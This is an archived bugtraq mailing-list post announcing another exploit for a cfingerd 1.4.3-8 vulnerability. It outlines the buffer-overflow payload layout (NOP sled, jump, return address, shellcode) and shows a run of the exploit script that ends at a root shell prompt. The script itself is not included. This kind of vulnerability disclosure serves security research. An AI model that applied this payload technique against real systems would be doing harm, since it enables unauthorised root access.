Dear bugtraq readers, This is another exploit for the flaw found by Steven Van Acker. http://www.securityfocus.com/archive/1/192844 In order to allow for more nops, I have constructed the payload like this: <82 nops><jmp 0x4><retaddr><shellcode> [teleh0r@localhost teleh0r]$ ./cfingerd-exploit.pl -s 1 Address: 0xbffff46c Exploit attempt succeeded! [teleh0r@localhost teleh0r]# Tested against cfingerd 1.4.3-8. Sincerely yours, teleh0r http://www.digit-labs.org/teleh0r/
cfingerd-exploit.pl- Re: Another exploit for cfingerd <= 1.4.3-8 teleh0r
- Re: Another exploit for cfingerd <= 1.4.3-8 Phil Stracchino
